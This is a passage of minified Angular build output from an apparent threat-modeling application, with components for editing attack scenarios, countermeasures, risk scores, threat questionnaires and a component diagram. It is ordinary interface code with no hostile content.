this.dataService.Project.GetAttackScenariosApplicable().filter(e=>e.Name.toLowerCase().includes(this.searchASString.toLowerCase())&&e!=this.attackScenario)}GetFilteredLinkedAttackScenarios(){return this.dataService.Project.GetAttackScenariosApplicable().filter(e=>e.Name.toLowerCase().includes(this.searchLinkedASString.toLowerCase())&&e!=this.attackScenario&&!this.attackScenario.LinkedScenarios.includes(e))}GetAttackScenarioGroups(){if(null==this.attackScenarioGroups){this.attackScenarioGroups=[];const e=this.dataService.Project.GetAttackScenariosApplicable().filter(i=>i!=this.attackScenario).reduce((i,n)=>Object.assign(Object.assign({},i),{[n.ViewID]:[...i[n.ViewID]||[],n]}),{});Object.keys(e).forEach(i=>{var n;this.attackScenarioGroups.push({name:null===(n=this.dataService.Project.GetView(i))||void 0===n?void 0:n.Name,scenarios:e[i]})}),this.attackScenarioGroups.forEach(i=>i.scenarios.sort((n,r)=>n.ThreatState>r.ThreatState?-1:n.ThreatState==r.ThreatState?0:1))}return this.attackScenarioGroups}AdoptRiskValuesFrom(e){e.ScoreCVSS&&(this.attackScenario.ScoreCVSS=JSON.parse(JSON.stringify(e.ScoreCVSS))),e.ScoreOwaspRR&&(this.attackScenario.ScoreOwaspRR=JSON.parse(JSON.stringify(e.ScoreOwaspRR))),this.attackScenario.Severity=e.Severity,this.attackScenario.SeverityReason=e.SeverityReason,this.attackScenario.Likelihood=e.Likelihood,this.attackScenario.LikelihoodReason=e.LikelihoodReason,this.attackScenario.Risk=e.Risk,this.attackScenario.RiskReason=e.RiskReason,this.attackScenario.RiskStrategy=e.RiskStrategy,this.attackScenario.RiskStrategyReason=e.RiskStrategyReason,this.OnLinkScenario(e)}GetRiskStrategies(){return fT.GetKeys()}GetRiskStrategyName(e){return fT.ToString(e)}GetFilteredCountermeasures(){return this.dataService.Project.GetCountermeasuresApplicable().filter(e=>e.Name.toLowerCase().includes(this.searchCMString.toLowerCase())&&!e.AttackScenarios.includes(this.attackScenario))}GetCountermeasureGroups(){if(null==this.countermeasureGroups){this.countermeasureGroups=[];const e=this.dataService.Project.GetCountermeasuresApplicable().filter(i=>!this.countermeasures.includes(i)).reduce((i,n)=>Object.assign(Object.assign({},i),{[n.ViewID]:[...i[n.ViewID]||[],n]}),{});Object.keys(e).forEach(i=>{var n;this.countermeasureGroups.push({name:null===(n=this.dataService.Project.GetView(i))||void 0===n?void 0:n.Name,countermeasures:e[i]})}),this.countermeasureGroups.forEach(i=>i.countermeasures.sort((n,r)=>n.MitigationState>r.MitigationState?-1:n.MitigationState==r.MitigationState?0:1))}return this.countermeasureGroups}AddExistingCountermeasure(e){e.AddAttackScenario(this.attackScenario),this.countermeasures=this.dataService.Project.GetCountermeasures().filter(i=>i.AttackScenarios.includes(this.attackScenario))}AddCountermeasure(){const e=this.dataService.Project.CreateCountermeasure(this.attackScenario.ViewID,!1);e.SetMapping(null,this.attackScenario.Targets,[this.attackScenario]),this.selectedCountermeasure=e,this.countermeasures=this.dataService.Project.GetCountermeasures().filter(i=>i.AttackScenarios.includes(this.attackScenario)),setTimeout(()=>{document.dispatchEvent(new KeyboardEvent("keydown",{key:"F2"}))},250)}RemoveCountermeasure(e){e.RemoveAttackScenario(this.attackScenario.ID),e==this.selectedCountermeasure&&(this.selectedCountermeasure=null),this.countermeasures=this.dataService.Project.GetCountermeasures().filter(i=>i.AttackScenarios.includes(this.attackScenario))}DeleteCountermeasure(e){this.dialog.OpenDeleteObjectDialog(e).subscribe(i=>{i&&(this.dataService.Project.DeleteCountermeasure(e),e==this.selectedCountermeasure&&(this.selectedCountermeasure=null),this.countermeasures=this.dataService.Project.GetCountermeasures().filter(n=>n.AttackScenarios.includes(this.attackScenario)))})}OnLinkScenario(e){this.attackScenario.AddLinkedAttackScenario(e),e.AddLinkedAttackScenario(this.attackScenario),this.selectedLinkedScenario=e}OnUnlinkScenario(e){this.attackScenario.RemoveLinkedAttackScenario(e.ID),e.RemoveLinkedAttackScenario(this.attackScenario.ID),this.selectedLinkedScenario==e&&(this.selectedLinkedScenario=null)}EditAttackScenario(e){this.dialog.OpenAttackScenarioDialog(e,!1,[this.attackScenario,...this.attackScenario.LinkedScenarios])}GetTestCases(){return this.dataService.Project.GetTesting().TestCases.filter(e=>!this.attackScenario.GetTestCases().includes(e))}GetFilteredTestCases(){return this.GetTestCases().filter(e=>e.Name.toLowerCase().includes(this.searchTCString.toLowerCase()))}OnLinkTestCase(e){e.AddLinkedAttackScenario(this.attackScenario),this.selectedTestCase=e}OnUnlinkTestCase(e){e.RemoveLinkedAttackScenario(this.attackScenario.ID),this.selectedTestCase==e&&(this.selectedTestCase=null)}GetSystemThreatsWidth(){return this.dataService.Project.Settings.ThreatActorToAttackScenario?"315px":"0px"}OnSearchASBoxClick(){var e,i,n;null===(n=null===(i=null===(e=this.searchASBox)||void 0===e?void 0:e._elementRef)||void 0===i?void 0:i.nativeElement)||void 0===n||n.focus()}OnSearchLinkedASBoxClick(){var e,i,n;null===(n=null===(i=null===(e=this.searchLinkedASBox)||void 0===e?void 0:e._elementRef)||void 0===i?void 0:i.nativeElement)||void 0===n||n.focus()}OnSearchCMBoxClick(){var e,i,n;null===(n=null===(i=null===(e=this.searchCMBox)||void 0===e?void 0:e._elementRef)||void 0===i?void 0:i.nativeElement)||void 0===n||n.focus()}OnSearchTCBoxClick(){var e,i,n;null===(n=null===(i=null===(e=this.searchTCBox)||void 0===e?void 0:e._elementRef)||void 0===i?void 0:i.nativeElement)||void 0===n||n.focus()}}return t.\u0275fac=function(e){return new(e||t)(Ee(Rc,8),Ee(Tt,8),Ee(Oa),Ee(Yi),Ee(Wn))},t.\u0275cmp=Wt({type:t,selectors:[["app-attack-scenario"]],viewQuery:function(e,i){if(1&e&&(Mi(F5e,5),Mi(V5e,5),Mi(B5e,5),Mi(H5e,5),Mi(U5e,5)),2&e){let n;Vt(n=Bt())&&(i.nameBox=n.first),Vt(n=Bt())&&(i.searchASBox=n.first),Vt(n=Bt())&&(i.searchLinkedASBox=n.first),Vt(n=Bt())&&(i.searchCMBox=n.first),Vt(n=Bt())&&(i.searchTCBox=n.first)}},hostBindings:function(e,i){1&e&&he("keydown",function(r){return i.onKeyDown(r)},0,Qc)},inputs:{attackScenario:"attackScenario",canEdit:"canEdit"},decls:1,vars:1,consts:[[3,"disable",4,"ngIf"],["appearance","fill",2,"width","calc(100% - 85px)"],["matInput","","matTooltipShowDelay","1000",3,"spellcheck","ngModel","matTooltip","ngModelChange"],["nameBox",""],["matSuffix","","mat-icon-button","","matTooltipShowDelay","1000",3,"matTooltip","click",4,"ngIf"],["appearance","fill",2,"width","70px","float","right"],["matInput","","type","number","min","0","required","","matTooltipShowDelay","1000",3,"ngModel","matTooltip","ngModelChange"],["style","color: red;","class","alert alert-danger",4,"ngIf"],["appearance","fill",1,"property-form-field"],["matTooltipShowDelay","1000",3,"value","matTooltip","valueChange"],[3,"value",4,"ngFor","ngForOf"],["color","warn","style","margin-left: 5px;",3,"matTooltip",4,"ngIf"],["appearance","fill",1,"property-form-field","disable"],["matInput","","matTooltipShowDelay","1000",3,"spellcheck","value","matTooltip"],["appearance","fill",1,"disable",2,"margin-left","10px","width","calc(100% - 600px - 30px)"],["matInput","",3,"spellcheck","value"],["appearance","fill",1,"property-form-field","disable",2,"margin-left","10px"],["no-space","","matTooltipShowDelay","1000",3,"value","matTooltip","valueChange"],["matInput","",1,"searchBox",3,"placeholder","keyup"],[3,"label",4,"ngFor","ngForOf"],["mat-icon-button","","matSuffix","","matTooltipShowDelay","1000",2,"width","25px",3,"matTooltip","click"],["appearance","fill",2,"margin-left","10px","width","calc(100% - 300px - 15px)"],["no-space","","multiple","",3,"value","valueChange","selectionChange"],["appearance","fill"],["no-space","","multiple","",3,"value","valueChange"],["appearance","fill","style","margin-left: 10px; width: 300px;",4,"ngIf"],["appearance","fill",2,"width","100%"],["matInput","","cdkTextareaAutosize","","cdkAutosizeMinRows","2","cdkAutosizeMaxRows","5",3,"spellcheck","ngModel","ngModelChange"],[3,"tagableElement"],["mat-icon-button","","matTooltipShowDelay","1000",3,"matMenuTriggerFor","matTooltip"],["raMenu","matMenu"],["mat-menu-item","",3,"disabled","click"],["mat-menu-item","",3,"matMenuTriggerFor"],["viewList","matMenu"],["mat-menu-item","",3,"ngModel","matMenuTriggerFor","placeholder","ngModelChange","click"],["searchASBox",""],["mat-menu-item","",3,"matMenuTriggerFor","matMenuTriggerData",4,"ngFor","ngForOf"],["scenarioList","matMenu"],["matMenuContent",""],["filteredScenarioList","matMenu"],["mat-menu-item","","matTooltipShowDelay","1000",3,"matTooltip","click",4,"ngFor","ngForOf"],["appearance","fill","style","width: 200px; margin-left: 10px;",4,"ngIf"],["appearance","fill",2,"width","190px","margin-left","30px"],[3,"value","valueChange","selectionChange"],["matSuffix","","mat-icon-button","",3,"click",4,"ngIf"],["appearance","fill",2,"width","190px","margin-left","10px"],[3,"value","valueChange"],["appearance","fill","style","width: 100%;",4,"ngIf"],[1,"row",2,"margin-bottom","10px"],[1,"column1"],[1,"prop-list","reorder-list"],["mat-subheader",""],["mat-icon-button","","matTooltipShowDelay","1000",2,"margin-left","15px",3,"matMenuTriggerFor","matTooltip"],["addMenu","matMenu"],["mat-menu-item","",3,"click"],["existingMenu","matMenu"],["searchCMBox",""],["countermeasureList","matMenu"],["filteredCountermeasureList","matMenu"],["matTooltipShowDelay","1000",3,"highlight-light","highlight-dark","matTooltip","click",4,"ngFor","ngForOf"],[1,"column2"],["style","margin: 10px 0 10px 10px;",4,"ngIf"],[1,"expansion-panel-headers-align",2,"pointer-events","initial"],[4,"ngIf"],["addLinkedMenu","matMenu"],["searchLinkedASBox",""],["linkedScenarioList","matMenu"],["filteredLinkedScenarioList","matMenu"],["class","row","style","margin-bottom: 10px;",4,"ngIf"],["matSuffix","","mat-icon-button","","matTooltipShowDelay","1000",3,"matTooltip","click"],[1,"alert","alert-danger",2,"color","red"],[3,"value"],["color","warn",2,"margin-left","5px",3,"matTooltip"],[3,"label"],["matTooltipShowDelay","1000",3,"value","matTooltip",4,"ngFor","ngForOf"],["matTooltipShowDelay","1000",3,"value","matTooltip"],["appearance","fill",2,"margin-left","10px","width","300px"],["srcSearch",""],["class","mat-option","color","primary",3,"checked","indeterminate","change",4,"ngIf"],["color","primary",1,"mat-option",3,"checked","indeterminate","change"],["mat-menu-item","",3,"matMenuTriggerFor","matMenuTriggerData"],["mat-menu-item","","matTooltipShowDelay","1000",3,"matTooltip","click"],["appearance","fill",2,"width","200px","margin-left","10px"],["matInput","","type","number",3,"ngModel","ngModelChange"],["matSuffix","","mat-icon-button","","aria-label","Edit",3,"click"],["matSuffix","","mat-icon-button","","aria-label","Delete",3,"click"],["matSuffix","","mat-icon-button","",3,"click"],["matTooltipShowDelay","1000",3,"matTooltip","click"],["mat-list-icon",""],["mat-line","",2,"pointer-events","initial"],["mat-icon-button","","matTooltipShowDelay","1000",2,"margin-left","auto","margin-right","0px",3,"matTooltip","click"],["mat-icon-button","","matTooltipShowDelay","1000",2,"margin-left","auto",3,"matTooltip","click"],[2,"margin","10px 0 10px 10px"],[3,"countermeasure"],["matExpansionPanelContent",""],[3,"entry"],[3,"canEdit","attackVector"],[3,"canEdit","threatQuestion"],[3,"canEdit","threatRule"],[3,"canEdit","attackScenario"],["addLinkedTCMenu","matMenu"],["searchTCBox",""],["filteredTCList","matMenu"],[3,"testCase"]],template:function(e,i){1&e&&ne(0,$7e,405,211,"div",0),2&e&&V("ngIf",i.attackScenario)},styles:['.column1[_ngcontent-%COMP%]{float:left;width:350px}.column2[_ngcontent-%COMP%]{float:left;width:calc(100% - 350px)}.row[_ngcontent-%COMP%]:after{content:"";display:table;clear:both}.prop-list[_ngcontent-%COMP%]   .mat-list-item[_ngcontent-%COMP%]{height:48px;cursor:pointer}.prop-list[_ngcontent-%COMP%]     .mat-list-item-content{padding:0 8px!important}.prop-list[_ngcontent-%COMP%]     .mat-list-text{padding-left:8px!important}.prop-list[_ngcontent-%COMP%]   .mat-subheader[_ngcontent-%COMP%]{display:contents}.prop-list-light[_ngcontent-%COMP%]{border-right:1px solid rgba(0,0,0,.1)}.prop-list-dark[_ngcontent-%COMP%]{border-right:1px solid rgba(255,255,255,.1)}.highlight-light[_ngcontent-%COMP%]{background-color:#0000001a}.highlight-dark[_ngcontent-%COMP%]{background-color:#ffffff1a}.property-form-field[_ngcontent-%COMP%]{width:300px}.reorder-list[_ngcontent-%COMP%]{max-width:100%;display:block;border-radius:4px;overflow:hidden}.reorder-box[_ngcontent-%COMP%]{padding:5px 10px;color:#000000de;display:flex;flex-direction:row;align-items:center;box-sizing:border-box;cursor:move;font-size:14px}.cdk-drag-preview[_ngcontent-%COMP%]{box-sizing:border-box;border-radius:4px;box-shadow:0 5px 5px -3px #0003,0 8px 10px 1px #00000024,0 3px 14px 2px #0000001f}.cdk-drag-placeholder[_ngcontent-%COMP%]{opacity:0}.cdk-drag-animating[_ngcontent-%COMP%]{transition:transform .25s cubic-bezier(0,0,.2,1)}.reorder-box[_ngcontent-%COMP%]:last-child{border:none}.reorder-list.cdk-drop-list-dragging[_ngcontent-%COMP%]   .reorder-box[_ngcontent-%COMP%]:not(.cdk-drag-placeholder){transition:transform .25s cubic-bezier(0,0,.2,1)}.disable[_ngcontent-%COMP%]{pointer-events:none}.searchBox[_ngcontent-%COMP%]{padding:0 16px;width:calc(100% - 32px);height:35px!important;line-height:35px!important;font-size:14px;font-weight:400}']}),t})();function K7e(t,a){if(1&t&&(m(0,"span",7),s(1),u()),2&t){const e=B().$implicit;V("matBadge",B().GetUnsetThreats(e))("matBadgeHidden",e.UserCheckedElement),C(1),ke(e.Name)}}function X7e(t,a){1&t&&(m(0,"mat-icon",14),s(1,"info"),u()),2&t&&V("matTooltip",B().$implicit.Description)}function Y7e(t,a){if(1&t){const e=Ye();m(0,"button",13),he("click",function(){be(e);const n=B().$implicit;return Me(B(3).OpenAttackVectors(n))}),oe(1,"translate"),s(2,"\n                "),m(3,"mat-icon"),s(4,"pageview"),u(),s(5,"\n              "),u()}2&t&&at("matTooltip",re(1,1,"pages.modeling.stack.questiondialog.moreDetails"))}function J7e(t,a){if(1&t&&(m(0,"mat-button-toggle",18),s(1),oe(2,"translate"),u()),2&t){const e=a.$implicit,i=B(2).$implicit;V("value",B(3).GetOptionValue(i.OptionType,e)),C(1),ke(re(2,2,e))}}function Z7e(t,a){if(1&t){const e=Ye();m(0,"td"),s(1,"\n              "),m(2,"mat-button-toggle-group",15,16),he("change",function(n){be(e);const r=B().$implicit;return Me(B(3).OnQuestionAnswered(n,r))}),s(4,"\n                "),ne(5,J7e,3,4,"mat-button-toggle",17),s(6,"\n              "),u(),s(7,"\n            "),u()}if(2&t){const e=B().$implicit,i=B(3);C(2),V("value",i.selectedComponent.ThreatQuestions[e.ID]),C(3),V("ngForOf",i.GetOptionKeys(e.OptionType))}}function eRe(t,a){if(1&t){const e=Ye();m(0,"tr"),s(1,"\n            "),m(2,"td"),s(3),ne(4,X7e,2,1,"mat-icon",11),s(5,"\n              "),ne(6,Y7e,6,3,"button",12),s(7,"\n            "),u(),s(8,"\n            "),ne(9,Z7e,8,2,"td",4),s(10,"\n            "),m(11,"td"),s(12,"\n              "),m(13,"button",13),he("click",function(){const r=be(e).$implicit;return Me(B(3).OpenNotes(r))}),oe(14,"translate"),s(15,"\n                "),m(16,"mat-icon",7),s(17,"edit_note"),u(),s(18,"\n              "),u(),s(19,"\n            "),u(),s(20,"\n          "),u()}if(2&t){const e=a.$implicit,i=B(3);let n;C(3),ct("\n              ",e.Question," \n              "),C(1),V("ngIf",(null==e.Description?null:e.Description.length)>0),C(2),V("ngIf",(null==(n=i.GetAssociatedAttackVectors(e))?null:n.length)>0),C(3),V("ngIf",1==e.OptionType),C(4),at("matTooltip",re(14,7,"general.Notes")),C(3),V("matBadge",i.GetNotesCountOfQuestion(e))("matBadgeHidden",i.GetNotesCountOfQuestion(e)<1)}}function tRe(t,a){if(1&t){const e=Ye();m(0,"tr"),s(1,"\n            "),m(2,"td"),s(3),oe(4,"translate"),m(5,"button",19),he("click",function(){return be(e),Me(B(3).NavigateToSettings())}),oe(6,"translate"),s(7,"\n                "),m(8,"mat-icon"),s(9,"open_in_new"),u(),s(10,"\n              "),u(),s(11,"\n            "),u(),s(12,"\n          "),u()}2&t&&(C(3),ct("\n              ",re(4,2,"pages.modeling.stack.questiondialog.noConfiguredQuestions"),"\n              "),C(2),at("matTooltip",re(6,4,"general.openInNew")))}function iRe(t,a){if(1&t){const e=Ye();s(0,"\n        "),m(1,"mat-form-field",8),s(2,"\n          "),m(3,"mat-label"),s(4),oe(5,"translate"),u(),s(6,"\n          "),m(7,"textarea",9),he("ngModelChange",function(n){return be(e),Me(B().$implicit.Description=n)}),u(),s(8,"\n        "),u(),s(9,"\n        "),m(10,"h3"),s(11),oe(12,"translate"),u(),s(13,"\n        "),it(14,"app-notes",10),s(15,"\n        "),m(16,"table"),s(17,"\n          "),ne(18,eRe,21,9,"tr",2),s(19,"\n          "),ne(20,tRe,13,6,"tr",4),s(21,"\n        "),u(),s(22,"\n      ")}if(2&t){const e=B().$implicit,i=B();let n;C(4),ke(re(5,10,"properties.Description")),C(3),V("ngModel",e.Description),C(4),ke(re(12,12,"general.Notes")),C(3),V("showTimestamp",!0)("hasCheckbox",!1)("canToggleTimestamp",!0)("canToggleCheckbox",!0)("notes",i.selectedComponent.Notes),C(4),V("ngForOf",i.GetThreatQuestions(i.selectedComponent)),C(2),V("ngIf",0==(null==(n=i.GetThreatQuestions(i.selectedComponent))?null:n.length))}}function aRe(t,a){1&t&&(m(0,"mat-tab"),s(1,"\n      "),ne(2,K7e,2,3,"ng-template",5),s(3,"\n      "),ne(4,iRe,23,14,"ng-template",6),s(5,"\n    "),u())}function nRe(t,a){if(1&t){const e=Ye();bt(0),s(1,"\n    "),m(2,"button",20),s(3),oe(4,"translate"),u(),s(5,"\n    "),m(6,"button",21),he("click",function(){return be(e),Me(B().Prev())}),s(7),oe(8,"translate"),u(),s(9,"\n    "),m(10,"button",21),he("click",function(){return be(e),Me(B().Next())}),s(11),oe(12,"translate"),u(),s(13,"\n  "),Mt()}if(2&t){const e=B();C(2),V("mat-dialog-close",!0),C(1),ke(re(4,6,"general.Close")),C(3),V("disabled",!e.canPrev),C(1),ke(re(8,8,"tour.prev")),C(3),V("disabled",!e.canNext),C(1),ke(re(12,10,"tour.next"))}}let kG=(()=>{class t{constructor(e,i,n,r,c){this.dialogRef=e,this.data=i,this.dataService=n,this.dialog=r,this.router=c,this.selectedTabIndex=0}get components(){return this.data.components}get selectedComponent(){return this.data.selectedComponent}set selectedComponent(e){this.data.selectedComponent=e,this.selectedTabIndex=this.components.indexOf(this.selectedComponent)}get canNext(){return!(this.components.length<=1)&&this.selectedComponent!=this.components[this.components.length-1]}get canPrev(){return!(this.components.length<=1)&&this.selectedComponent!=this.components[0]}ngOnInit(){this.selectedComponent=this.selectedComponent,setTimeout(()=>{this.components.filter(e=>!e.UserCheckedElement).forEach(e=>{0==Object.values(e.ThreatQuestions).filter(i=>null==i).length&&(e.UserCheckedElement=!0)})},10)}OnQuestionAnswered(e,i){var n;this.selectedComponent.ThreatQuestions[i.ID]=e.value;let r=Pl.GetOptions(i.OptionType).find(d=>d.Value==e.value);this.selectedComponent.SetProperty(null===(n=i.Property)||void 0===n?void 0:n.ID,i.ChangesPerOption[r.Key].Value)}OpenAttackVectors(e){this.GetAssociatedAttackVectors(e).forEach(n=>{this.dialog.OpenViewAttackVectorDialog(n,!1)})}OpenNotes(e){null==this.selectedComponent.NotesPerQuestion[e.ID]&&(this.selectedComponent.NotesPerQuestion[e.ID]=[]),this.dialog.OpenNotesDialog(this.selectedComponent.NotesPerQuestion[e.ID],!0,!1,!0,!0)}GetUnsetThreats(e){let i=Object.values(e.ThreatQuestions).filter(n=>null===n).length;return 0!=i||e.UserCheckedElement?i.toString():(setTimeout(()=>{e.UserCheckedElement=!0},100),"")}GetNotesCountOfQuestion(e){return this.selectedComponent.NotesPerQuestion[e.ID]?this.selectedComponent.NotesPerQuestion[e.ID].length:0}GetAssociatedAttackVectors(e){let i=[];if(null!=e.Property){let n=this.dataService.Config.GetThreatRules().filter(r=>r.RuleType==on.Component&&r.ComponentRestriction.componentTypeID==this.selectedComponent.Type.ID);n=n.filter(r=>r.ComponentRestriction.DetailRestrictions.some(c=>c.PropertyRest.ID==e.Property.ID)),i.push(...n.filter(r=>null!=r.AttackVector).map(r=>r.AttackVector))}return i}GetThreatQuestions(e){let i=[];return Object.keys(e.ThreatQuestions).forEach(n=>i.push(this.dataService.Config.GetThreatQuestion(n))),i}GetOptionKeys(e){return Pl.GetOptions(e).map(i=>i.Key)}GetOptionValue(e,i){return Pl.GetOptions(e).find(n=>n.Key==i).Value}GetOptionValues(e){return Pl.GetOptions(e)}Next(){this.selectedComponent=this.components[this.components.indexOf(this.selectedComponent)+1]}Prev(){this.selectedComponent=this.components[this.components.indexOf(this.selectedComponent)-1]}NavigateToSettings(){this.router.navigate(["configuration"],{queryParams:{index:this.selectedComponent.Type.ComponentTypeID}})}}return t.\u0275fac=function(e){return new(e||t)(Ee(Gh),Ee(gp),Ee(Yi),Ee(Wn),Ee(Oo))},t.\u0275cmp=Wt({type:t,selectors:[["app-question-dialog"]],decls:15,vars:4,consts:[["mat-dialog-title",""],[2,"max-width","800px",3,"selectedIndex","selectedIndexChange"],[4,"ngFor","ngForOf"],["align","end"],[4,"ngIf"],["mat-tab-label",""],["matTabContent",""],["matBadgeColor","warn","matBadgePosition","below",3,"matBadge","matBadgeHidden"],["appearance","fill",2,"width","100%","margin","5px 0px"],["matInput","","cdkTextareaAutosize","","cdkAutosizeMinRows","2","cdkAutosizeMaxRows","5","type","text",3,"ngModel","ngModelChange"],[3,"showTimestamp","hasCheckbox","canToggleTimestamp","canToggleCheckbox","notes"],["style","vertical-align: middle;",3,"matTooltip",4,"ngIf"],["mat-icon-button","",3,"matTooltip","click",4,"ngIf"],["mat-icon-button","",3,"matTooltip","click"],[2,"vertical-align","middle",3,"matTooltip"],[3,"value","change"],["group",""],[3,"value",4,"ngFor","ngForOf"],[3,"value"],["mat-button","","matTooltipShowDelay","1000",1,"toolBtn",3,"matTooltip","click"],["mat-button","",3,"mat-dialog-close"],["mat-button","",3,"disabled","click"]],template:function(e,i){1&e&&(m(0,"h2",0),s(1),u(),s(2,"\n"),m(3,"mat-dialog-content"),s(4,"\n  "),m(5,"mat-tab-group",1),he("selectedIndexChange",function(r){return i.selectedComponent=i.components[r]}),s(6,"\n    "),ne(7,aRe,6,0,"mat-tab",2),s(8,"\n  "),u(),s(9,"\n"),u(),s(10,"\n"),m(11,"mat-dialog-actions",3),s(12,"\n  "),ne(13,nRe,14,12,"ng-container",4),s(14,"\n"),u()),2&e&&(C(1),ke(i.selectedComponent.Name),C(4),V("selectedIndex",i.selectedTabIndex),C(2),V("ngForOf",i.components),C(6),V("ngIf",!0))},styles:[".toolBtn[_ngcontent-%COMP%]{width:30px;min-width:30px;padding:0;line-height:25px;margin-left:5px}"]}),t})();function oRe(t,a){if(1&t){const e=Ye();fi(),ln(),m(0,"button",2),he("click",function(){be(e);const n=B();return Me(n.AddTestCase(n.selectedComponent))}),oe(1,"translate"),s(2,"\n      "),m(3,"mat-icon"),s(4,"checklist"),u(),s(5,"\n    "),u()}if(2&t){const e=B();at("matTooltip",re(1,2,"pages.modeling.diagram.addTestCase")),V("disabled",!e.selectedComponent)}}function rRe(t,a){if(1&t&&(m(0,"div",25),s(1),u()),2&t){const e=B().$implicit,i=B(2);Ct("component-dark",i.theme.IsDarkMode),C(1),ke(i.GetComponentPort(e))}}function sRe(t,a){if(1&t){const e=Ye();m(0,"div",11),s(1,"\n            "),m(2,"button",23),he("click",function(){const r=be(e).$implicit;return Me(B(2).OnComponentClick(r))})("dblclick",function(){const r=be(e).$implicit;return Me(B(2).OnComponentDblClick(r))})("contextmenu",function(n){const c=be(e).$implicit;return Me(B(2).OpenContextMenu(n,c))}),s(3),u(),s(4,"\n            "),ne(5,rRe,2,3,"div",24),s(6,"\n          "),u()}if(2&t){const e=a.$implicit,i=B(2);let n;C(2),ri("opacity",e.IsActive?1:.5)("border-color",i.GetComponentColor(e))("border-style",e.OutOfScope?"dotted":"solid"),Ct("component-dark",i.theme.IsDarkMode)("component-third-party",e.IsThirdParty),V("matBadge",i.CompBadge(e))("matBadgeHidden",0==i.CompBadge(e).length),C(1),ct("\n              ",e.Name,"\n            "),C(2),V("ngIf",(null==(n=i.GetComponentPort(e))?null:n.length)>0)}}function cRe(t,a){1&t&&(m(0,"button",26),s(1,"Temp"),u())}function lRe(t,a){if(1&t){const e=Ye();m(0,"tr",19),he("drop",function(n){const c=be(e).$implicit;return Me(B().OnDrop(n,c))}),s(1,"\n        "),m(2,"td")(3,"p",20),s(4),u()(),s(5,"\n        "),m(6,"td",10),s(7,"\n          "),ne(8,sRe,7,14,"div",21),s(9,"\n          "),ne(10,cRe,2,0,"button",22),s(11,"\n        "),u(),s(12,"\n      "),u()}if(2&t){const e=a.$implicit,i=B();C(4),ke(e.Name),C(4),V("ngForOf",i.GetComponents(e)),C(2),V("ngIf",null==i.GetComponents(e)||0==i.GetComponents(e).length)}}function dRe(t,a){if(1&t&&(m(0,"span",31),s(1),u()),2&t){const e=B(2).item;C(1),ke(e.GetProperty("Name"))}}function mRe(t,a){if(1&t){const e=Ye();m(0,"button",29),he("click",function(){be(e);const n=B(2).item;return Me(B().AddTestCase(n))}),s(1,"\n          "),m(2,"mat-icon"),s(3,"checklist"),u(),s(4,"\n          "),m(5,"span"),s(6),oe(7,"translate"),u(),s(8,"\n        "),u()}2&t&&(C(6),ke(re(7,1,"pages.modeling.diagram.addTestCase")))}function uRe(t,a){if(1&t){const e=Ye();bt(0),s(1,"\n        "),ne(2,dRe,2,1,"span",28),s(3," \n        "),m(4,"button",29),he("click",function(){be(e);const n=B().item;return Me(B().OnComponentDblClick(n))}),s(5,"\n          "),m(6,"mat-icon"),s(7,"question_answer"),u(),s(8,"\n          "),m(9,"span"),s(10),oe(11,"translate"),u(),s(12,"\n        "),u(),s(13,"\n        "),m(14,"button",29),he("click",function(){be(e);const n=B().item;return Me(B().OnDeleteElement(n))}),s(15,"\n          "),m(16,"mat-icon"),s(17,"delete"),u(),s(18,"\n          "),m(19,"span"),s(20),oe(21,"translate"),u(),s(22,"\n        "),u(),s(23,"\n        "),m(24,"button",29),he("click",function(){be(e);const n=B().item;return Me(B().AddThreat(n))}),s(25,"\n          "),m(26,"mat-icon"),s(27,"flash_on"),u(),s(28,"\n          "),m(29,"span"),s(30),oe(31,"translate"),u(),s(32,"\n        "),u(),s(33,"\n        "),ne(34,mRe,9,3,"button",30),s(35,"\n        "),m(36,"button",29),he("click",function(){be(e);const n=B().item;return Me(B().AddCountermeasure(n))}),s(37,"\n          "),m(38,"mat-icon"),s(39,"security"),u(),s(40,"\n          "),m(41,"span"),s(42),oe(43,"translate"),u(),s(44,"\n        "),u(),s(45,"\n        "),m(46,"button",29),he("click",function(){be(e);const n=B().item;return Me(B().MoveLeft(n))}),s(47,"\n          "),m(48,"mat-icon"),s(49,"arrow_back"),u(),s(50,"\n          "),m(51,"span"),s(52),oe(53,"translate"),u(),s(54,"\n        "),u(),s(55,"\n        "),m(56,"button",29),he("click",function(){be(e);const n=B().item;return Me(B().MoveRight(n))}),s(57,"\n          "),m(58,"mat-icon"),s(59,"arrow_forward"),u(),s(60,"\n          "),m(61,"span"),s(62),oe(63,"translate"),u(),s(64,"\n        "),u(),s(65,"\n      "),Mt()}if(2&t){const e=B().item,i=B();C(2),V("ngIf",e),C(8),ke(re(11,8,"properties.openQuestionnaire")),C(10),ke(re(21,10,"pages.modeling.stack.deleteComponent")),C(10),ke(re(31,12,"pages.modeling.diagram.addAttackScenario")),C(4),V("ngIf",i.dataService.Project.HasTesting),C(8),ke(re(43,14,"pages.modeling.diagram.addCountermeasure")),C(10),ke(re(53,16,"pages.modeling.stack.moveLeft")),C(10),ke(re(63,18,"pages.modeling.stack.moveRight"))}}function hRe(t,a){if(1&t&&(s(0,"\n      "),ne(1,uRe,66,20,"ng-container",27),s(2,"\n    ")),2&t){const e=a.item;C(1),V("ngIf",e)}}let gT=(()=>{class t{constructor(e,i,n,r,c){this.theme=e,this.dataService=i,this.dialog=n,this.dialogService=r,this.elRef=c,this.menuTopLeftPosition={x:"0",y:"0"},this.selectionChanged=new Tt}get components(){var e;return null===(e=this.stack)||void 0===e?void 0:e.GetChildren()}ngOnInit(){}CompBadge(e){return e.IsActive&&!e.UserCheckedElement?"!":""}GetGroups(){return this.dataService.Config.GetMyComponentTypeGroups(this.stack.ComponentTypeID)}GetComponents(e){return this.components.filter(i=>e.Types.includes(i.Type))}OnComponentClick(e){this.selectedComponent=e,this.selectionChanged.emit(e)}OnComponentDblClick(e){e.IsActive=!0,this.selectedComponent=e;let i={components:this.components.filter(r=>r.IsActive),selectedComponent:this.selectedComponent};this.dialog.open(kG,{hasBackdrop:!0,data:i}).afterClosed().subscribe(r=>{this.selectedComponent=i.selectedComponent})}OnDrop(e,i){const n=JSON.parse(e.dataTransfer.getData("dragDropData"));let r;n.componentTypeID&&(r=this.dataService.Config.GetMyComponentType(n.componentTypeID)),r||(r=this.dataService.Config.CreateMyComponentType(i));const c=this.dataService.Project.CreateComponent(r);c.SyncNameToTypeName=!0,c.Name=r.Name,c.IsActive=!0,c.IsThirdParty=!1,this.stack.AddChild(c),this.OnComponentClick(c),setTimeout(()=>{document.dispatchEvent(new KeyboardEvent("keydown",{key:"F2"}))},250)}AllowDrop(e){e.preventDefault()}GetComponentColor(e){return 